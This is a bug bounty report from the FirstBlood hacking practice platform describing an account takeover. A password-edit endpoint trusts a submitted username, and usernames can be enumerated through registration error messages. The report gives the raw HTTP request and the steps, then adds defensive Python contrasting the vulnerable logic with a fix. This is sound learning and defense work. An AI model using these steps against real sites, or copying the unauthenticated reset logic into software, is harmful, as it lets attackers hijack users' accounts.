FirstBlood-#899 — Editpassword function leads to ATO for any user
This issue was discovered on FirstBlood v2
On 2021-10-30, 0xirfan Level 5 reported:
Summary
When looking at the source code of /drpanel/index.php# I found an interesting comment.
So I tried it to change the password of any user, and it worked.
Details
From the comments I got some idea about the request:
Request Path : /drpanel/drapi/editpassword.php
Request Method : POST
Content-Type: application/x-www-form-urlencoded
body : username=
So the only data required to change the password of a doctor was his username. Thankfully FirstBlood has a user enumeration bug in /register.php.
If a username previously registered with FirstBlood is used with inviteCode test, it will lead to the error "This invite code is not valid.". We can use this information to enumerate usernames.
Steps
1. Use the Intruder at /register.php to enumerate usernames.
2. After that, send this request with the usernames you enumerated:
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: 8ef80def9df5-0xirfan.a.firstbloodhackers.com
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 14
username=
3. Log in with the username and the updated password.
Impact
Doctor ATO
P2 High
Parameter:
Payload:
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admin's password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
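As an added defender-side illustration (example code, not FirstBlood's own), the following Python sketches the reported editpassword logic beside a hardened version that binds the change to the authenticated session and re-checks the current password, plus a registration reply that no longer differs for existing usernames. The in-memory user store, the form and session dicts and the invite code are constructed assumptions.

```python
import hashlib
import hmac
import os

# Illustrative in-memory store standing in for FirstBlood's doctor table (assumption).
USERS = {}
VALID_INVITES = {"invite-demo-123"}  # constructed sample invite code

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def set_password(username, password):
    salt = os.urandom(16)
    USERS[username] = {"salt": salt, "hash": _hash(password, salt)}

def verify(username, password):
    user = USERS.get(username)
    if user is None:
        return False
    return hmac.compare_digest(_hash(password, user["salt"]), user["hash"])

def editpassword_vulnerable(form, session):
    # Reported logic: the target account is whatever username the client sends and the
    # session is never consulted, so knowing a username is enough to reset its password.
    username = form.get("username")
    if username not in USERS:
        return 404, "Unknown user"
    set_password(username, form.get("password", ""))
    return 200, "Password updated"

def editpassword_hardened(form, session):
    # Fix: ignore any client-supplied username, act only on the authenticated session's
    # user, and require the current password before accepting a new one.
    username = session.get("user")
    if username is None:
        return 401, "Authentication required"
    if not verify(username, form.get("current_password", "")):
        return 403, "Current password incorrect"
    set_password(username, form["new_password"])
    return 200, "Password updated"

def register_response(username, invite_code, password):
    # Fix for the enumeration: one generic message whether the username is already taken
    # or the invite code is wrong, so the reply no longer reveals which accounts exist.
    if username in USERS or invite_code not in VALID_INVITES:
        return 400, "Registration failed: check the username and invite code"
    set_password(username, password)
    return 201, "Registered"
```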
Creator & Administrator
Actually this bug could be used to gain access to the drAdmin account which is the main root admin account. This could be found from the different error message on FirstBlood v2, or from the previous policy on FirstBlood v1 :) Nice find though!